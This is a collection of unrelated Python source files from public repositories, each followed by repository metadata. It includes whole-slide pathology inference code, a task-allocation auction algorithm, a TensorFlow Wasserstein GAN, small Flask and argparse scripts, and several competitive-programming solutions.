Path(ev)/'out_npz'\n outs = PathUtils.list_pathes(ev, ending='npz')\n for out in outs:\n name_pathes_map[out.stem].append(str(out))\n lens = [len(v) for k,v in name_pathes_map.items()]\n lens_unique = np.unique(lens)\n if len(lens_unique)!=1 or lens_unique[0]<2:\n raise ValueError('invalid unique pathes', lens_unique)\n\n mkdir(Path(out_dir))\n for name, pathes in tqdm(name_pathes_map.items()):\n out_path = Path(out_dir)/(name+'.npz')\n if out_path.exists() and not overwrite:\n continue\n contents = [np.load(str(path)) for path in pathes]\n agg = dict_agg_type(contents, number_unique=True, string_unique=True, rest_unique=True,\n only_common_keys=True, ignore_keys=['image','path'])\n keys = list(agg.keys())\n save_arrays(out_path, **agg)\n print('Done!')\n\ndef combine_predictions(eval_dirs, out_dir, overwrite=False, id='name'):\n fnames = ['out.csv', 'predictions.csv']\n\n for fname in fnames:\n ppathes = [Path(ev)/fname for ev in eval_dirs]\n out_path = Path(out_dir)/fname\n if out_path.exists() and not overwrite or not ppathes[0].exists():\n continue\n dfs = [pd.read_csv(ppath) for ppath in ppathes]\n # for i,df in enumerate(dfs):\n # fold_name = eval_dirs[i].split('fold')[-1].split('/')[0]\n # df['fold'] = fold_name\n df = df_concat(*dfs)\n\n cols = [str(c) for c in df.columns if c not in ['path','image']]\n out_cols = [c for c in cols if c.startswith('out') or c.startswith('pred')]\n agg = {c:(c,unique_one) for c in cols}\n agg.update({c:(c,np.mean) for c in out_cols})\n agg.update({c+'_std':(c,np.std) for c in out_cols})\n df = df.groupby(id).agg(**agg)\n assert len(df)==len(dfs[0])\n # print_df(df.head())\n df_save(df, out_path)\n print(str(out_path))\n\n\ndef create_combined_heatmaps(npz_dir, out_dir, train_type, wsi_dir=None, overwrite=False, no_links=False):\n # rec = dfp.to_dict('records')[0]\n hm_writer = HeatmapWriter(npz_dir=npz_dir, overwrite=overwrite, no_links=no_links, train_type=train_type)\n npzs = PathUtils.list_pathes(npz_dir, ending='npz')\n mkdir(out_dir)\n for npz in tqdm(npzs):\n kwargs = {}\n if wsi_dir is not None:\n kwargs['wsi_path'] = Path(wsi_dir)/(npz.stem+'.tif')\n hm_writer.save_hm_and_patches_with(name=npz.stem, out_dir=out_dir, **kwargs)\n\n\nclass NicInference(object):\n def __init__(self, model_dir, pack=False, overwrite=False, no_links=False, hmraw=False,\n compress_batch_size=32, compress_multiproc=False, compress_args=None, num_workers=0,\n skip_compression=False):\n self.model_dir = Path(model_dir)\n self.overwrite = overwrite\n self.pack = pack\n\n self.no_links = no_links\n self.hmraw = hmraw\n\n results = read_json_dict(self.model_dir/ 'results.json')\n self.clf_thresholds = results.get('validation',{}).get('clf_thresholds',None)\n self.args = read_json_dict(self.model_dir/ 'args.json')\n self.train_type = self.args['train_type']\n self.target_names = self.args.get('class_names',self.args.get('target_names'))\n\n net_conf = self.args['net_conf']\n self.code_size = self.args['enc_dim']\n self.fp16 = self.args.get('precision',None)==16\n if compress_args is None:\n self.compress_args = read_json_dict(self.model_dir/ 'compress_args.json')\n elif is_string_or_path(compress_args):\n self.compress_args = read_json_dict(compress_args)\n else:\n self.compress_args = compress_args\n self.compress_args['batch_size'] = compress_batch_size\n # if self.compress_args.get('multiproc',False):\n self.compress_args['multiproc'] = compress_multiproc\n self.skip_compression = skip_compression\n\n self.model = create_nic_model(**net_conf)\n model_path = 
find_pl_model_path(self.model_dir)\n load_pl_state_dict(model_path, self.model, replacements={'att_net.attention_a':'att_net.att_m',\n 'att_net.attention_b':'att_net.att_gate',\n 'att_net.attention_c':'att_net.att_last'})\n\n self.num_workers = num_workers\n\n # self.device = create_device()\n\n def _pack(self, slide, mask, out_dir):\n raise ValueError('implement caling packing')\n\n def _compress(self, slide_path, mask_path, out_dir):\n cargs = self.compress_args.copy()\n cargs.update(dict(out_dir=out_dir, multiproc=False, thumbs=False, overwrite=self.overwrite),\n data=str(slide_path), mask_dir=str(mask_path))\n out_format = self.compress_args.get('out_format','h5')\n # ok = compress(slide_path, mask_dir=mask_path, **cargs)\n ok = compress(**cargs)\n if not ok:\n raise ValueError('compression of %s failed, params %s' % (str(slide_path), self.compress_args))\n compressed_path = Path(out_dir)/(Path(slide_path).stem+'.'+out_format)\n return compressed_path\n\n def apply(self, slide_path=None, mask_path=None, compressed_path=None, out_dir=None, no_hm=False):\n if compressed_path is None and slide_path is None:\n raise ValueError('either slide or compressed have to be specified')\n\n if out_dir is None:\n out_dir = Path(self.model_dir)/'apply'\n else:\n out_dir = Path(out_dir)\n\n if compressed_path is None:\n if mask_path is None:\n print('Warning! no masks')\n\n if self.pack and mask_path is not None:\n slide_path, mask_path = self._pack(slide_path, mask_path, out_dir/'packed')\n\n compressed_path = self._compress(slide_path, mask_path, out_dir=out_dir/'compressed')\n\n slide_name = Path(slide_path).stem\n target_names = self.args['target_names'] if 'target_names' in self.args else self.args['class_names']\n dummy_entry = {DataConf.name_col:slide_name, DataConf.image_col:str(slide_path), DataConf.split_col:'testing'}\n for tn in target_names:\n dummy_entry[tn] = 1\n dummydf = pd.DataFrame([dummy_entry])\n data_conf = DataConf(dummydf, train_type=self.train_type, target_names=target_names)\n compressed_dir = str(Path(compressed_path).parent.absolute())\n\n\n ds = CompressedDataset(compressed_dir, data_conf=data_conf, split='testing', flat=False, convert_f32=self.args.get('fp16',None) in [False, None])\n loader = DataLoader(ds, batch_size=1, num_workers=self.num_workers)\n\n dfp = self._apply_loader(loader, out_dir)\n\n rec = dfp.to_dict('records')[0]\n rec['compressed'] = compressed_path\n if not no_hm:\n hm_writer = HeatmapWriter(npz_dir=out_dir, overwrite=self.overwrite, no_links=self.no_links,\n hmraw=self.hmraw, train_type=self.train_type)\n hm_writer.save_hm_and_patches(rec, out_dir, data_conf.get_target_cols())\n\n hm_path = hm_writer.history_hm_pathes[slide_name][0]\n rec['hm_path'] = str(Path(hm_path).absolute())\n return rec\n\n def _apply_loader(self, loader, out_dir):\n inf_out_writer = InferenceOutWriter(overwrite=self.overwrite)\n inferencer = Inferencer(self.model, post_fct=TrainType.post_fct(self.train_type), overwrite=self.overwrite,\n callbacks=[inf_out_writer], fp16=self.fp16)\n dfp = inferencer.apply(loader, out_dir)\n print_df(dfp)\n return dfp\n\n def apply_config(self, config, overwrite=False, compressed_dir=None, out_dir=None):\n if compressed_dir is None:\n compressed_dir = out_dir/'compressed'\n mkdir(compressed_dir)\n if not self.skip_compression:\n cargs = self.compress_args.copy()\n cargs.update(dict(out_dir=out_dir, thumbs=False, overwrite=self.overwrite))\n # out_format = self.compress_args.get('out_format','h5')\n ok = compress(config, overwrite=overwrite, 
**cargs)\n\n\n\n def _get_last_model_path(self):\n return find_pl_model_path(self.out_dir, last=True)\n # return Path(self.out_dir)/'last.ckpt'\n\n","repo_name":"DIAGNijmegen/pathology-whole-slide-learning","sub_path":"wsilearn/apply_nic.py","file_name":"apply_nic.py","file_ext":"py","file_size_in_byte":9569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22857689505","text":"import numpy as np\n\n\ndef gcaa_solution(agents, G, tasks_cells):\n na = agents[\"N\"]\n pos_a = agents[\"Pos\"]\n\n nt = tasks_cells[\"N\"]\n pos_t = tasks_cells[\"Pos\"]\n\n # Initialize global variables\n\n # Initialize GCAA parameters\n GCAA_Params = gcaa_init(0, 0, tasks_cells[\"prob_a_t\"], tasks_cells[\"lambda\"])\n\n # Define agents and tasks\n\n # Define agent default fields\n agent_default = {\n \"id\": 0,\n \"type\": 0,\n \"avail\": 0,\n \"clr\": [],\n \"x\": 0,\n \"y\": 0,\n \"z\": 0,\n \"nom_vel\": 0,\n \"fuel\": 0,\n \"Lt\": 0,\n \"v_a\": [0, 0],\n \"rin_task\": [],\n \"vin_task\": [],\n \"previous_task\": [],\n \"previous_winnerBids\": [],\n \"kdrag\": 0,\n }\n\n # Define task default fields\n task_default = {\n \"id\": 0,\n \"type\": 0,\n \"value\": 0,\n \"start\": 0,\n \"end\": 0,\n \"duration\": 0,\n \"tf\": 0,\n \"x\": 0,\n \"y\": 0,\n \"z\": 0,\n \"Speed\": 0,\n \"radius\": 0,\n \"tloiter\": 0,\n }\n\n # Create default agents and tasks\n agent_quad = agent_default.copy()\n agent_quad[\"type\"] = GCAA_Params[\"AGENT_TYPES\"][\"QUAD\"]\n\n task_track = task_default.copy()\n task_track[\"type\"] = GCAA_Params[\"TASK_TYPES\"][\"TRACK\"]\n\n # Create random agents\n agents_list = []\n for n in range(na):\n agent = agent_quad.copy()\n agent[\"id\"] = n + 1\n agent[\"x\"] = pos_a[n, 0]\n agent[\"y\"] = pos_a[n, 1]\n agent[\"v_a\"] = agents[\"v_a\"][n]\n agent[\"Lt\"] = agents[\"Lt\"][n]\n agent[\"rin_task\"] = []\n agent[\"vin_task\"] = []\n agent[\"previous_task\"] = agents[\"previous_task\"][n]\n agent[\"previous_winnerBids\"] = agents[\"previous_winnerBids\"][n]\n agent[\"kdrag\"] = agents[\"kdrag\"]\n agents_list.append(agent)\n\n # Create random tasks\n tasks_list = []\n for m in range(nt):\n task = task_track.copy()\n task[\"id\"] = m + 1\n task[\"x\"] = pos_t[m, 0]\n task[\"y\"] = pos_t[m, 1]\n task[\"tf\"] = tasks_cells[\"tf\"][m]\n task[\"value\"] = tasks_cells[\"r_bar\"][m]\n task[\"Speed\"] = tasks_cells[\"Speed\"][m]\n task[\"type\"] = tasks_cells[\"task_type\"][m]\n task[\"radius\"] = tasks_cells[\"radius\"][m]\n task[\"tloiter\"] = tasks_cells[\"tloiter\"][m]\n tasks_list.append(task)\n\n # Run GCAA\n GCAA_Assignments, S_GCAA_agents, S_GCAA_ALL_agents, agents_list = gcaa_main(\n agents_list, tasks_list, G, tasks_cells[\"prob_a_t\"], tasks_cells[\"lambda\"]\n )\n\n p = []\n for i in range(na):\n path = GCAA_Assignments[i][\"path\"]\n ind = np.where(path == -1)[0]\n if len(ind) > 0:\n path = path[: ind[0]]\n p.append(path.tolist())\n\n winners = np.zeros(na)\n for i in range(na):\n if len(p[i]) > 0:\n winners[i] = p[i][0]\n\n winners_matrix = winner_vector_to_matrix(na, nt, winners)\n\n S_GCAA_ALL = np.zeros(nt)\n rt = np.zeros(nt)\n for j in range(nt):\n S_GCAA_ALL[j] = calc_task_utility(\n agents[\"Pos\"],\n agents[\"v_a\"],\n tasks_cells[\"Pos\"][j],\n tasks_cells[\"Speed\"][j],\n tasks_cells[\"tf\"][j],\n tasks_cells[\"r_bar\"][j],\n j + 1,\n tasks_cells[\"prob_a_t\"],\n winners_matrix,\n tasks_cells[\"lambda\"],\n agents[\"kdrag\"],\n )\n rt[j] = tasks_cells[\"r_bar\"][j] * (\n 1 - np.prod(1 - winners_matrix[:, j] * 
tasks_cells[\"prob_a_t\"][:, j])\n )\n\n S_GCAA = np.sum(S_GCAA_ALL)\n\n # Fix the tasks if the completion is close\n for i in range(na):\n task_idx = p[i]\n if len(task_idx) == 0:\n agents[\"previous_task\"][i] = 0\n agents[\"previous_winnerBids\"][i] = 0\n else:\n task_idx = task_idx[0]\n if (\n tasks_list[task_idx][\"tloiter\"] > 0\n and (tasks_list[task_idx][\"tf\"] - tasks_list[task_idx][\"tloiter\"])\n / tasks_list[task_idx][\"tloiter\"]\n < 1\n ):\n p[i] = agents[\"previous_task\"][i]\n agents_list[i][\"rin_task\"] = []\n else:\n agents[\"previous_task\"][i] = task_idx\n agents[\"previous_winnerBids\"][i] = S_GCAA_ALL_agents[i]\n\n rin_task = np.zeros((na, nt))\n vin_task = np.zeros((na, nt))\n for i in range(na):\n rin_task[i] = agents_list[i][\"rin_task\"]\n vin_task[i] = agents_list[i][\"vin_task\"]\n\n return (\n p,\n S_GCAA,\n S_GCAA_ALL,\n rt,\n {\n \"Pos\": agents[\"Pos\"],\n \"v_a\": agents[\"v_a\"],\n \"Lt\": agents[\"Lt\"],\n \"previous_task\": agents[\"previous_task\"],\n \"previous_winnerBids\": agents[\"previous_winnerBids\"],\n \"rin_task\": rin_task,\n \"vin_task\": vin_task,\n },\n )\n","repo_name":"Gaochengzhi/MACM","sub_path":"GreedyCoalitionAuctionAlgorithm/GCAASolution.py","file_name":"GCAASolution.py","file_ext":"py","file_size_in_byte":4895,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"39171092214","text":"#18870번 좌표 압축\nif __name__ == \"__main__\":\n n = int(input())\n nums = list(map(int,input().split()))\n result = list(sorted(set(nums))) #set을 통해 중복 제거\n dic = {}\n for i in range(len(result)) : \n dic[result[i]] = i #dictionary를 통해 각 숫자에 매칭되는 출력값 설정\n for i in nums : \n print(dic[i],end = ' ')\n","repo_name":"tomy9729/Algorithm","sub_path":"BaekJoon/Step-by-step troubleshooting(단계별로 문제풀기)/12. 
정렬/18870번 좌표 압축.py","file_name":"18870번 좌표 압축.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"19433957037","text":"from typing import List\nfrom collections import deque\n\n\nclass Node:\n def __init__(self, val=None, children=None):\n self.val = val\n self.children = children\n\n\nclass Solution:\n def preorder(self, root: 'Node') -> List[int]:\n if root:\n lst = [root.val]\n if root.children:\n for child in root.children:\n lst.extend(self.preorder(child))\n else:\n return []\n return lst\n\n def preorder_iter(self, root: 'Node') -> List[int]:\n if not root:\n return []\n deq = deque([root])\n\n lst = list()\n while len(deq):\n el = deq.pop()\n lst.append(el.val)\n if el.children is not None:\n deq.extend(el.children[::-1])\n return lst\n","repo_name":"plocinskipiotr/my_leetcode","sub_path":"problems/easy/n_ary_tree_preorder_traversal/n_ary_tree_preorder_traversal.py","file_name":"n_ary_tree_preorder_traversal.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21124907106","text":"import time\r\nfrom flask import Flask, redirect, url_for, render_template, request\r\nfrom flask_cors import CORS\r\n\r\napp = Flask(__name__)\r\nCORS(app)\r\n\r\n@app.route('/result', methods=('GET', 'POST'))\r\ndef get_current_time():\r\n if request.method == 'POST':\r\n data = request.get_json(force=True)\r\n print(data)\r\n return data\r\n else:\r\n return \"hello\"\r\n","repo_name":"Robert-J-Schelling/Black-Scholes-Calculator","sub_path":"Reactjs-Study/blackscholes/api/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11809617401","text":"import argparse\nfrom command_modules.create_info_sheet import create_info_sheet\nfrom command_modules.aggregate_grades import aggregate_grades\n\n\ndef fill_team_grades(args):\n grade_file = args.grade_file\n team_file = args.team_file\n return\n\n\nif __name__ == \"__main__\":\n # Create argument parser\n parser = argparse.ArgumentParser(description=\"A utility for EPICS document creation and grading.\")\n subparsers = parser.add_subparsers(description='The main commands for the program', dest='command', required=True)\n\n # fill team grades\n parser_fill_grades = subparsers.add_parser('fill-grades', help='Distribute grades for all members of a team')\n parser_fill_grades.add_argument('--grade-file', required=True)\n parser_fill_grades.add_argument('--team-file', required=True)\n parser_fill_grades.set_defaults(func=fill_team_grades)\n\n # create student info TEX file\n student_info_command = \"team-notes-sheet\"\n parser_student_info = subparsers.add_parser(student_info_command, help='Create tex output for team info files')\n parser_student_info.add_argument('--team-file', default=\"class_data/team_list.csv\")\n parser_student_info.add_argument('--student-info-file', default=\"class_data/eLearning_user_information.csv\")\n parser_student_info.add_argument('--document-title', default=\"EPICS Class List\")\n parser_student_info.add_argument('--output-dir-name', default=\"student_info_doc\")\n parser_student_info.add_argument('--image-location')\n\n # aggregate team grades into TEX file\n aggregate_grades_command = \"aggregate-grades\"\n parser_grade_aggregate = subparsers.add_parser(aggregate_grades_command,\n help='Aggregate grades 
from assignments by team')\n parser_grade_aggregate.add_argument('--team-file', default=\"class_data/team_list.csv\")\n parser_grade_aggregate.add_argument('--grade-files', default=\"class_data/grade_files\")\n parser_grade_aggregate.add_argument('--document-title', default=\"Mid-Semester Grade Summary\")\n parser_grade_aggregate.add_argument('--output-dir-name', default=\"semester_grade_review\")\n\n # Parse args and run command\n top_args = parser.parse_args()\n if top_args.command == student_info_command:\n create_info_sheet(top_args)\n elif top_args.command == aggregate_grades_command:\n aggregate_grades(top_args)\n else:\n print(\"Function not implemented!\")\n","repo_name":"MStolen/EPICS_Teaching_Utility","sub_path":"EPICS_Util.py","file_name":"EPICS_Util.py","file_ext":"py","file_size_in_byte":2426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"38136394628","text":"\"\"\" Implementation of the Wasserstein GAN and improved Wasserstein GAN \"\"\"\n\nimport tensorflow as tf\n\nfrom rivalgan.base_gan import BaseGAN\nfrom rivalgan.net_layers import create_descriminator_layers, create_generator_layers\nfrom rivalgan.utils import xavier_init\n\n\nclass WassersteinGAN(BaseGAN):\n \"\"\" Implementation of the Wasserstein GAN and improved Wasserstein GAN \"\"\"\n\n def __init__(self, gan_configuration):\n self.d_h1, self.d_h2, self.d_h3 = None, None, None\n self.clip_dis = None\n if gan_configuration._name == 'IWGAN':\n self.improved_wgan = True\n super().__init__(gan_configuration)\n\n def generator(self, h1_nodes=500, h2_nodes=500):\n \"\"\" Create generator\n Generator weights/biases\n g_h1: hidden layer 1 weights and biases\n g_h2: hidden layer 2 weights and biases\n g_h3: hidden layer 3 weights and biases\n \"\"\"\n\n g_h1 = {'weights': tf.Variable(xavier_init([self.z_dim, h1_nodes], 'g_w1', tf.float32)),\n 'biases': tf.Variable(tf.zeros(h1_nodes), name='g_b1', dtype=tf.float32)}\n g_h2 = {'weights': tf.Variable(xavier_init([h1_nodes, h2_nodes], 'g_w2', tf.float32)),\n 'biases': tf.Variable(tf.zeros([h2_nodes]), name='g_b2', dtype=tf.float32)}\n g_h3 = {'weights': tf.Variable(xavier_init([h2_nodes, self.X_node], 'g_w3', tf.float32)),\n 'biases': tf.Variable(tf.zeros([self.X_node]), name='g_b3', dtype=tf.float32)}\n\n # Generate fake x's from output layer of generator\n\n self.gen_X = create_generator_layers(self.prior_z, g_h1, g_h2, g_h3, self.keep_prob)\n\n # List of 'var_list' for generator trainer to optimise\n self.gen_params = [g_h1['weights'], g_h1['biases'],\n g_h2['weights'], g_h2['biases'],\n g_h3['weights'], g_h3['biases']]\n\n def discriminator(self, h1_nodes=500, h2_nodes=500):\n \"\"\" Create discriminator\n Discriminator weights/biases\n d_h1: hidden layer 1 weights and biases\n d_h2: hidden layer 2 weights and biases\n d_h3: hidden layer 3 weights and biases\n \"\"\"\n self.d_h1 = {'weights': tf.Variable(xavier_init([self.X_node, h1_nodes], 'd_w1', tf.float32)),\n 'biases': tf.Variable(tf.zeros([h1_nodes]), name='d_b1', dtype=tf.float32)}\n self.d_h2 = {'weights': tf.Variable(xavier_init([h1_nodes, h2_nodes], 'd_w2', tf.float32)),\n 'biases': tf.Variable(tf.zeros([h2_nodes]), name='d_b2', dtype=tf.float32)}\n self.d_h3 = {'weights': tf.Variable(xavier_init([h2_nodes, self.y_node], 'd_w3', tf.float32)),\n 'biases': tf.Variable(tf.zeros([self.y_node]), name='d_b3', dtype=tf.float32)}\n # Output shape has 2 features; Shape: [batch(real) + batch(gen.), 2]\n\n # Real data output\n self.y_data = 
create_descriminator_layers(self.X, self.d_h1, self.d_h2, self.d_h3) # 'y_data' == D(x)\n\n # Generated data output\n self.gen_y = create_descriminator_layers(self.gen_X, self.d_h1, self.d_h2, self.d_h3) # 'gen_y' == D[G(z)]\n\n ## List of 'var_list' for discriminator trainer to optimise ##\n self.dis_params = [self.d_h1['weights'], self.d_h1['biases'],\n self.d_h2['weights'], self.d_h2['biases'],\n self.d_h3['weights'], self.d_h3['biases']]\n\n if not self.improved_wgan:\n # Clipping of discriminator\n print(\"Clipping discriminator weights\")\n self.clip_dis = [param.assign(tf.clip_by_value(param, -0.05, 0.05)) for param in self.dis_params]\n\n def optimise(self, train_step=0.0001):\n \"\"\" Optimizers for discriminator and generator losses \"\"\"\n\n # Improved GAN (with regularization)\n if self.improved_wgan:\n eps = tf.random_uniform([self.X_node, ], minval=0., maxval=1.)\n X_inter = eps * self.X + (1. - eps) * self.gen_X\n interp = create_descriminator_layers(X_inter, self.d_h1, self.d_h2, self.d_h3) # Interpolation\n grad = tf.gradients(interp, [X_inter])[0]\n grad_norm = tf.sqrt(tf.reduce_sum((grad) ** 2, axis=1))\n lam = 10\n grad_pen = lam * tf.reduce_mean((grad_norm - 1) ** 2)\n\n self.d_loss = tf.reduce_mean(self.y_data) - tf.reduce_mean(self.gen_y) + grad_pen\n self.g_loss = - tf.reduce_mean(self.gen_y)\n\n self.d_trainer = tf.train.GradientDescentOptimizer(learning_rate=train_step).minimize(self.d_loss,\n var_list=self.dis_params)\n self.g_trainer = tf.train.AdamOptimizer(learning_rate=train_step).minimize(self.g_loss,\n var_list=self.gen_params)\n\n\n else:\n self.d_loss = tf.reduce_mean(self.y_data) - tf.reduce_mean(self.gen_y)\n self.g_loss = - tf.reduce_mean(self.gen_y)\n\n # Optimisation Trainers\n self.d_trainer = tf.train.GradientDescentOptimizer(learning_rate=train_step).minimize(self.d_loss,\n var_list=self.dis_params)\n self.g_trainer = tf.train.AdamOptimizer(learning_rate=train_step).minimize(self.g_loss,\n var_list=self.gen_params)\n","repo_name":"ygrepo/RivalGan","sub_path":"rivalgan/wgan.py","file_name":"wgan.py","file_ext":"py","file_size_in_byte":5526,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"18824545602","text":"import argparse\nimport time\n\nparser = None\n\ndef make(): \n print(\"start make \")\n time.sleep(2)\n print(\"end make\")\n\ndef make_install(): \n print(\"start make install \")\n time.sleep(2)\n print(\"end make install\")\n\ndef make_clean():\n print(\"start make clean\")\n time.sleep(2)\n print(\"end make clean\")\n\n\nparser = argparse.ArgumentParser(description='模拟编译操作')\nparser.add_argument('do',type=str,nargs='?' 
,help='设置需要做的操作',choices=['install','clean'])\n\nresult = parser.parse_args()\n#print(result)\n\n# 开始根据参数进行判定\n\nif result.do == None: \n make()\nelif result.do == \"install\":\n make_install()\nelif result.do == \"clean\":\n make_clean()\nelse:\n pass","repo_name":"zzjlogin/mydoc","sub_path":"source/demo/argparse/案例的/make.py","file_name":"make.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"32803813798","text":"import pandas as pd\nimport math\nimport json\n# ==========================================================================\n# This file does the secondary data processing step for the data:\n# Objective is to match the columns that involve names of countries to match the standard format in country_coordinates.csv\n\n# ==========================================================================\n##### RAW DATA FORM\n# Loading the data\ndf = pd.read_csv(\"invalid_coordinates_dataframe.csv\")\ncountry_coords = pd.read_csv(\"country_coordinates.csv\")\n\n# ==========================================================================\n##### SECONDARY PROCESSING STEP\n\n# HashMap of wrong country name to correct country names: correctionMap[WRONG_NAME] = CORRECT_NAME\n# correctionsMap[\"\"] = \"\"\ncorrectionsMap = {}\ncorrectionsMap[\"United States of America\"] = \"United States\"\ncorrectionsMap[\"Czech Rep.\"] = \"Czech Republic\"\ncorrectionsMap[\"Russian Federation\"] = \"Russia\"\ncorrectionsMap[\"Serbia and Kosovo: S/RES/1244 (1999)\"] = \"Serbia\"\ncorrectionsMap[\"Viet Nam\"] = \"Vietnam\"\ncorrectionsMap[\"United Kingdom of Great Britain and Northern Ireland\"] = \"United Kingdom\"\ncorrectionsMap[\"Iran (Islamic Rep. of)\"] = \"Iran\"\ncorrectionsMap[\"Palestinian\"] = \"Palestinian Territories\"\ncorrectionsMap[\"Dem. Rep. of the Congo\"] = \"Congo [DRC]\"\ncorrectionsMap[\"Lao People's Dem. Rep.\"] = \"Laos\"\ncorrectionsMap[\"Venezuela (Bolivarian Republic of)\"] = \"Venezuela\"\ncorrectionsMap[\"Syrian Arab Rep.\"] = \"Syria\"\ncorrectionsMap[\"Rep. of Moldova\"] = \"Moldova\"\ncorrectionsMap[\"Bolivia (Plurinational State of)\"] = \"Bolivia\"\ncorrectionsMap[\"China, Hong Kong SAR\"] = \"Hong Kong\"\ncorrectionsMap[\"Dem. People's Rep. of Korea\"] = \"North Korea\"\ncorrectionsMap[\"Dominican Rep.\"] = \"Dominican Republic\"\ncorrectionsMap[\"Myanmar\"] = \"Myanmar [Burma]\"\ncorrectionsMap[\"United Rep. of Tanzania\"] = \"Tanzania\"\ncorrectionsMap[\"The former Yugoslav Rep. 
of Macedonia\"] = \"Macedonia [FYROM]\"\n\n# Change all wrong countries to correct country names\nfor wrongCountryName in correctionsMap:\n correctCountryName = correctionsMap[wrongCountryName]\n df.loc[df['Origin'] == wrongCountryName, 'Origin'] = correctCountryName\n df.loc[df['Country / territory of asylum/residence'] == wrongCountryName, 'Country / territory of asylum/residence'] = correctCountryName\n\n# Convert coordinates dataframe to dictionary form\ncoords_dict = dict(zip(country_coords.name, zip(country_coords.longitude, country_coords.latitude)))\n\n# Convert country of origin and asylum to geo coordinates\ndf['coor_from'] = df['Origin'].map(coords_dict)\ndf['coor_to'] = df['Country / territory of asylum/residence'].map(coords_dict)\n\n# Save the dataframe\ndf.to_csv('corrected_coordinates_dataframe.csv', index=False)\n","repo_name":"chewterence/MagnaMigratio","sub_path":"data processing/secondary_data_processor.py","file_name":"secondary_data_processor.py","file_ext":"py","file_size_in_byte":2726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17712174110","text":"import sys\nimport struct\n\n__all__ = [ \\\n 'matrix_to_bytes', 'bytes_to_matrix'\n]\n\ndef matrix_to_bytes(matrix, code_size):\n elements = [None] * len(matrix)\n for i, m in enumerate(matrix):\n # elements[i] = struct.pack('=' + 'H' * len(m), *m)\n ms = [int.to_bytes(mm, code_size, sys.byteorder) for mm in m]\n elements[i] = b''.join(ms)\n# print('elements =', elements)\n return b''.join(elements)\n\ndef bytes_to_matrix(bys, element_num, horizontal_size, code_size):\n matrix = [None] * element_num\n for i in range(element_num):\n horizontal_bytes = bys[i*horizontal_size:(i+1)*horizontal_size]\n nums = [None] * element_num\n for j in range(element_num):\n byts = horizontal_bytes[j*code_size:(j+1)*code_size]\n num = int.from_bytes(byts, sys.byteorder)\n nums[j] = num\n matrix[i] = nums\n # print('matrix[{}] = {}'.format(i, matrix[i]))\n return matrix\n","repo_name":"umedoblock/fugou","sub_path":"src/par2/par2/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70944374200","text":"# Check If String Is a Prefix of Array\n#\n# easy\n#\n# Tags:\n#\n# Time: TBD\n# Space: TBD\n#\n# Solution:\n# TBD\n\nfrom typing import List\n\n\ndef isPrefixString(s: str, words: List[str]) -> bool:\n pos = 0\n\n for w in words:\n if not s.startswith(w, pos):\n return False\n\n pos += len(w)\n\n if pos >= len(s):\n return True\n\n return True if pos >= len(s) else False\n\n\nprint(\n isPrefixString(s=\"iloveleetcode\",\n words=[\"i\", \"love\", \"leetcode\", \"apples\"]), True)\nprint(\n isPrefixString(s=\"iloveleetcode\",\n words=[\"i\", \"apples\", \"leetcode\", \"apples\"]), False)\n\nprint(isPrefixString(s=\"ccccccccccc\", words=[\"c\", \"cc\"]), False)\n","repo_name":"d4rkr00t/leetcode-tasks","sub_path":"contest/w253/1-check-if-string-is-a-prefix-of-array.py","file_name":"1-check-if-string-is-a-prefix-of-array.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3585335141","text":"# 2022/10/27 Baek 17404\nimport sys\ninput = sys.stdin.readline\nINF = int(1e9)\n\nn = int(input())\nrgb = []\nfor _ in range(n):\n rgb.append(list(map(int, input().split())))\n\nans = INF\nfor i in range(3):\n dp = [[INF] * 3 for _ in range(n)]\n dp[0][i] = 
rgb[0][i]\n for j in range(1, n):\n dp[j][0] = rgb[j][0] + min(dp[j - 1][1], dp[j - 1][2])\n dp[j][1] = rgb[j][1] + min(dp[j - 1][0], dp[j - 1][2])\n dp[j][2] = rgb[j][2] + min(dp[j - 1][0], dp[j - 1][1])\n\n for j in range(3):\n if i != j:\n ans = min(ans, dp[-1][j])\n\nprint(ans)\n\n#dp 배열크기를 재선언 하지 않는 효율적인 코드\nimport sys\ninput = sys.stdin.readline\n\nINF = int(1e9)\nN = int(input())\nrgb = []\nfor _ in range(N):\n rgb.append(list(map(int, input().split())))\n\ndp = [[0] * 3 for _ in range(2)]\nans = INF\n\nfor k in range(3):\n dp[0][0], dp[0][1], dp[0][2] = INF, INF, INF\n dp[0][k] = rgb[0][k]\n\n for i in range(1, N):\n dp[1][0] = min(dp[0][1], dp[0][2]) + rgb[i][0]\n dp[1][1] = min(dp[0][0], dp[0][2]) + rgb[i][1]\n dp[1][2] = min(dp[0][0], dp[0][1]) + rgb[i][2]\n\n dp[0][0], dp[0][1], dp[0][2] = dp[1][0], dp[1][1], dp[1][2]\n\n ans = min(ans, dp[0][(k + 1) % 3], dp[0][(k + 2) % 3])\n\nprint(ans)","repo_name":"kkw2758/Algorithm","sub_path":"DP/baek_17404.py","file_name":"baek_17404.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36603777740","text":"import re\nimport json\nimport csv\nfrom collections import OrderedDict\n\n\nclass InfoParser:\n def __init__(self, infoname):\n self.infoname = infoname\n if not re.match(r'.*\\.log\\.csv$', infoname):\n raise Exception(\"Need .log.csv file\")\n\n 